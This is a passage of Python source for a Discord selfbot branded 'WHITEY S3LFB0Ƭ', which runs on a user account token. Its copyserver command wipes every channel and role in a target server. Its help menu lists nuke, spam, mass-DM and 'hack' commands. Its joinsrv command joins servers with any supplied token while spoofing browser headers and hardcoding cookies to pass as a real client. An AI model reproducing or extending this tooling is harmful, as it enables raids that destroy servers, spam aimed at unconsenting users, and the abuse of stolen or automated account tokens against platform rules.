def_text += f" *Example: {definition['example']}*\n"
meanings_list.append(def_text)
result_text = f"**{word.capitalize()}**\n\n" + '\n'.join(meanings_list)
await ctx.send(result_text)
else:
await ctx.send("`-` **NO DEFINATIONS FOR THAT WORD**")
else:
await ctx.send("`-` **FAILED TO RETRIVE THAT WORD**")
@leakedsb.command()
async def copyserver(ctx, source_guild_id: int, target_guild_id: int):
source_guild = leakedsb.get_guild(source_guild_id)
target_guild = leakedsb.get_guild(target_guild_id)
if not source_guild or not target_guild:
await ctx.send("`-` **GUILD NOT FOUND**")
return
# Delete all channels in the target guild
for channel in target_guild.channels:
try:
await channel.delete()
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN} CHANNEL {channel.name} HAS BEEN DELETED ON THE TARGET GUILD")
await asyncio.sleep(0)
except Exception as e:
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({red}!{gray}) {pretty}{Fore.RED} ERROR DELETING CHANNEL {channel.name}: {e}")
# Delete all roles in the target guild except for roles named "here" and "@everyone"
for role in target_guild.roles:
if role.name not in ["here", "@everyone"]:
try:
await role.delete()
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN} ROLE {role.name} HAS BEEN DELETED ON THE TARGET GUILD")
await asyncio.sleep(0)
except Exception as e:
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({red}!{gray}) {pretty}{Fore.RED} ERROR DELETING ROLE {role.name}: {e}")
# Clone roles from source to target
roles = sorted(source_guild.roles, key=lambda role: role.position)
for role in roles:
try:
new_role = await target_guild.create_role(name=role.name, permissions=role.permissions, color=role.color, hoist=role.hoist, mentionable=role.mentionable)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN} {role.name} HAS BEEN CREATED ON THE TARGET GUILD")
await asyncio.sleep(0)
# Update role permissions after creating the role
for perm, value in role.permissions:
await new_role.edit_permissions(target_guild.default_role, **{perm: value})
except Exception as e:
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({red}!{gray}) {pretty}{Fore.RED} ERROR CREATING ROLE {role.name}: {e}")
# Clone channels from source to target
text_channels = sorted(source_guild.text_channels, key=lambda channel: channel.position)
voice_channels = sorted(source_guild.voice_channels, key=lambda channel: channel.position)
category_mapping = {} # to store mapping between source and target categories
for channel in text_channels + voice_channels:
try:
if channel.category:
# If the channel has a category, create it if not created yet
if channel.category.id not in category_mapping:
category_perms = channel.category.overwrites
new_category = await target_guild.create_category_channel(name=channel.category.name, overwrites=category_perms)
category_mapping[channel.category.id] = new_category
# Create the channel within the category
if isinstance(channel, discord.TextChannel):
new_channel = await new_category.create_text_channel(name=channel.name)
elif isinstance(channel, discord.VoiceChannel):
# Check if the voice channel already exists in the category
existing_channels = [c for c in new_category.channels if isinstance(c, discord.VoiceChannel) and c.name == channel.name]
if existing_channels:
new_channel = existing_channels[0]
else:
new_channel = await new_category.create_voice_channel(name=channel.name)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN} CHANNEL {channel.name} HAS BEEN CREATED ON THE TARGET GUILD")
# Update channel permissions after creating the channel
for overwrite in channel.overwrites:
if isinstance(overwrite.target, discord.Role):
target_role = target_guild.get_role(overwrite.target.id)
if target_role:
await new_channel.set_permissions(target_role, overwrite=discord.PermissionOverwrite(allow=overwrite.allow, deny=overwrite.deny))
elif isinstance(overwrite.target, discord.Member):
target_member = target_guild.get_member(overwrite.target.id)
if target_member:
await new_channel.set_permissions(target_member, overwrite=discord.PermissionOverwrite(allow=overwrite.allow, deny=overwrite.deny))
await asyncio.sleep(0) # Add delay here
else:
# Create channels without a category
if isinstance(channel, discord.TextChannel):
new_channel = await target_guild.create_text_channel(name=channel.name)
elif isinstance(channel, discord.VoiceChannel):
new_channel = await target_guild.create_voice_channel(name=channel.name)
# Update channel permissions after creating the channel
for overwrite in channel.overwrites:
if isinstance(overwrite.target, discord.Role):
target_role = target_guild.get_role(overwrite.target.id)
if target_role:
await new_channel.set_permissions(target_role, overwrite=discord.PermissionOverwrite(allow=overwrite.allow, deny=overwrite.deny))
elif isinstance(overwrite.target, discord.Member):
target_member = target_guild.get_member(overwrite.target.id)
if target_member:
await new_channel.set_permissions(target_member, overwrite=discord.PermissionOverwrite(allow=overwrite.allow, deny=overwrite.deny))
await asyncio.sleep(0) # Add delay here
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN} CHANNEL {channel.name} HAS BEEN CREATED ON THE TARGET GUILD")
except Exception as e:
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({red}!{gray}) {pretty}{Fore.RED} ERROR CREATING CHANNEL {channel.name}: {e}")
http_session = aiohttp.ClientSession()
@leakedsb.command()
async def change_hypesquad(ctx):
choices = {
1: "BRAVERY",
2: "BRILLIANCE",
3: "BALANCED"
}
await ctx.send("`[1] Bravery`\n`[2] Brilliance`\n`[3] BalanceD`")
await ctx.send("`-` **ENTER YOU CHOICE**: `1,2,3`")
def check(m):
return m.author == ctx.author and m.channel == ctx.channel
try:
msg = await leakedsb.wait_for('message', check=check, timeout=60)
choice = int(msg.content)
except asyncio.TimeoutError:
await ctx.send("`-` **COMMAND TIMED OUT**")
return
except ValueError:
await ctx.send("`-` **INVALID CHOICE PLEASE ENTER** : `1 , 2 , 3`")
return
headerpost = {
'Authorization': token
}
payloadsosat = {
'house_id': choice
}
try:
await ctx.send(f"`-` **CHANGING HYPESQUAD TO {choices.get(choice, 'Unknown')}**")
async with http_session.post("https://discord.com/api/v8/hypesquad/online", json=payloadsosat, headers=headerpost) as response:
if response.status == 204:
await ctx.send("`-` **HYPESQUAD CHANGED SUCCESFULLY**")
elif response.status == 401:
await ctx.send("`-` **TOKEN INVALID OR EXPIRED**")
elif response.status == 429:
await ctx.send("`-` **PLEASE WAIT FOR 2 MINUTES**")
else:
await ctx.send("`-` **WE CAUGHT WITH AN ERROR**")
except Exception as e:
await ctx.send(f"`-` **AN ERROR OCCURED :** `{str(e)}`")
http_session = aiohttp.ClientSession()
@leakedsb.command()
async def help(ctx):
message = (
f"# __WHITEY S3LFB0Ƭ__\n**</>** **HELP COMMANDS**\n\n`-` **JOIN'S SERVER** : `+joinsrv <link> <token>`\n`-` **C2I** : `+c2i 10$`\n`-` **I2C** : `+i2c ₹100`\n`-` **SERVER CLONER** : `+copyserver <guild id to copy> <target guild id>`\n`-` **DEFINE** : `+define <word>`\n`-` **BACKUP** : `+backup`\n`-` **ASCI** : `+asci <text>`\n`-` **avatar** : `+avatar <user>`\n`-` **CREATE_ROLE** : `+create_role RoleName`\n`-` **CREATE_CHANNEL** : `+create_channel ChannelName`\n`-` **GITSEARCH** : `+gitsearch repository_name`\n`-` **GITUSER** : `+gituser username`\n`-` **AUTORESPONSE** : `+addar <trigger> , <response> | +removear <trigger name> | +lister`\n`-` **STATUS ROTATOR** : `+setrotator <msg1> , <msg2>`, `+stoprotator`\n`-` **BAL** : `+bal LTC_address`\n`-` **BANNER** : `+banner`\n`-` **STREAMING** : `+streaming Watchin Movies`\n`-` **WATCHING** : `+watching Coding`\n`-` **LISTENING** : `+listening to Music`\n`-` **PLAYING** : `+playing Games`\n`-` **STOPACTIVITY** : `+stopactivity`\n`-` **LINK** : `link`\n`-` **CONNECT VC** : `+connectvc <vc_id>`\n`-` **SPAM** : `+spam <no.> <msg>`\n`-` **HYPE SQUAD CHANGE** : `+change_hypesquad`\n`-` **NUKE** : `+nukezzz`\n`-` **IPLOOKUP** : `+iplookup <ip_address>`\n`-` **LTC PRICE** : `+ltcprice`\n`-` **MASDMFRIENDS** : `+masdmfriends`\n`-` **MASSREACT** : `+massreact`\n`-` **BOOSTS** : `boosts`\n`-` **LOVERATE** : `+loverate`\n`-` **HACK** : `+hack`\n`-` **GAYRATE** : `+gayrate`\n`-` **SELFBOT** : `Selfbot`\n`-` **YTSEARCH** : `+ytsearch video_title`\n`-` **CHECKPROMO** : `+checkpromo promo_links`\n`-` **WAIFU** : `+waifu`\n`-` **IMGSEARCH** : `+imgsearch <query>`\n`-` **GUILDICON** : `+guildicon`\n`-` **CLEAR** : `+purge <no. of msg>`\n`-` **NITRO** : `+nitro`\n`-` **SAVE TRANSCRIPT** : `+savetranscript`\n`-` **MATH** : `+math <equation>`\n`-` **VOUCH** : `vouch`\n`-` **NITRO** : `+nitro`\n\n**・`TYPE [+antinuke_help] AND [+fun_help] FOR THEIR COMMANDS...`**\n\n**ASKED BY :** `{leakedsb.user.name}`"
)
await ctx.send(message)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}HELP SENT SUCCESFULLY✅ ")
await ctx.message.delete()
# ANTINUKE
@leakedsb.command()
async def antinuke_help(ctx):
message = (
f"# __WHITEY S3LFB0Ƭ__\n**</>** __**ANTINUKE HELP CMD**__\n\n`-` **ANTINUKE ENABLE** : `+antinuke_true`\n`-` **ANTINUKE DISABLE** : `+antinuke_false`\n`-` **WHITELIST** : `+whitelist`\n`-` **UNWHITELIST** : `+unwhitelist`\n`-` **WHITELISTED** : `+whitelisted`\n`-` **CLEAR WHITE LIST** : `+clearwl`\n\n`-` **ASKED BY** : `{leakedsb.user.name}`"
)
await ctx.send(message)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}ANTI-HELP SENT SUCCESFULLY✅ ")
await ctx.message.delete()
# JOIN SERVER
@leakedsb.command()
async def joinsrv(ctx, invite_link: str, token: str):
code = get_invite_code(invite_link)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': '*/*',
'Accept-Language': 'fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/json',
'X-Context-Properties': 'eyJsb2NhdGlvbiI6IkpvaW4gR3VpbGQiLCJsb2NhdGlvbl9ndWlsZF9pZCI6Ijk4OTkxOTY0NTY4MTE4ODk1NCIsImxvY2F0aW9uX2NoYW5uZWxfaWQiOiI5OTAzMTc0ODgxNzg4NjgyMjQiLCJsb2NhdGlvbl9jaGFubmVsX3R5cGUiOjB9',
'Authorization': token.strip('\"'), # Remove surrounding double quotes from token
'X-Super-Properties': 'eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRmlyZWZveCIsImRldmljZSI6IiIsInN5c3RlbV9sb2NhbGUiOiJmciIsImJyb3dzZXJfdXNlcl9hZ2VudCI6Ik1vemlsbGEvNS4wKChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwMi4wIiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTAyLjAiLCJvc192ZXJzaW9uIjoiMTAiLCJyZWZlcnJlciI6IiIsInJlZmVycmluZ19kb21haW4iOiIiLCJyZWZlcnJlcl9jdXJyZW50IjoiIiwicmVmZXJyaW5nX2RvbWFpbl9jdXJyZW50IjoiIiwicmVsZWFzZV9jaGFubmVsIjoic3RhYmxlIiwiY2xpZW50X2J1aWxkX251bWJlciI6MTM2MjQwLCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ==',
'X-Discord-Locale': 'en-US',
'X-Debug-Options': 'bugReporterEnabled',
'Origin': 'https://discord.com',
'DNT': '1',
'Connection': 'keep-alive',
'Referer': 'https://discord.com',
'Cookie': '__dcfduid=21183630021f11edb7e89582009dfd5e; __sdcfduid=21183631021f11edb7e89582009dfd5ee4936758ec8c8a248427f80a1732a58e4e71502891b76ca0584dc6fafa653638; locale=en-US',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'TE': 'trailers',
}
async with aiohttp.ClientSession() as session:
async with session.post(f"https://canary.discord.com/api/v9/invites/{code}", headers=headers, json={}) as resp:
if resp.status == 200:
await ctx.send("Joined successfully")
elif resp.status == 429:
j = await resp.json()
await ctx.send(f"Ratelimited for {j['retry_after']} seconds")
await asyncio.sleep(j['retry_after'])
elif resp.status == 403:
await ctx.send("Locked token")
else:
j = await resp.json()
await ctx.send(f"Failed to join the server. Error: {j}")
return
async def aprint(text):
print(text)
def get_invite_code(link):
if link.startswith("https://discord.gg/"):
return link[19:]
elif link.startswith(".gg/"):
return link[4:]
else:
return link
# FUN
@leakedsb.command()
async def fun_help(ctx):
message = (
f"# __WHITEY S3LFB0Ƭ__\n**</>** __**FUN CMD. HELP**__\n\n`-` **CUDDLE** : `+cuddle <user>`\n`-` **PAT** : `+pat <user>` \n`-` **KISS** : `+kiss <user>` \n`-` **SLAP** : `+slap <user>`\n`-` **HUG** : `+hug <user>`\n`-` **SMUG** : `+smug <user>`\n`-` **FEED** : `+feed <user>`\n\n`-` **ASKED BY** : `{leakedsb.user.name}`"
)
await ctx.send(message)
print(f"{reset}[ {cyan}{time_rn}{reset} ] {gray}({green}+{gray}) {pretty}{Fore.GREEN}FUN-HELP SENT SUCCESFULLY✅ ")
await ctx.message.delete()
#ASCII
@leakedsb.command()
@commands.check(is_authorized)
async def asci(ctx, *, text):
f = Figlet(font='standard')
ascii_art = f.renderText(text)
await ctx.send(f'```{ascii_art}```')
# AVATAR
@leakedsb.command(aliases=['av','ava'])
@commands.check(is_authorized)
async def avatar(ctx, member: Member = None):
member = member or ctx.author
avatar_url = member.avatar_url_as(format="png")
await ctx.send(f"Avatar of {member.mention}: {avatar_url}")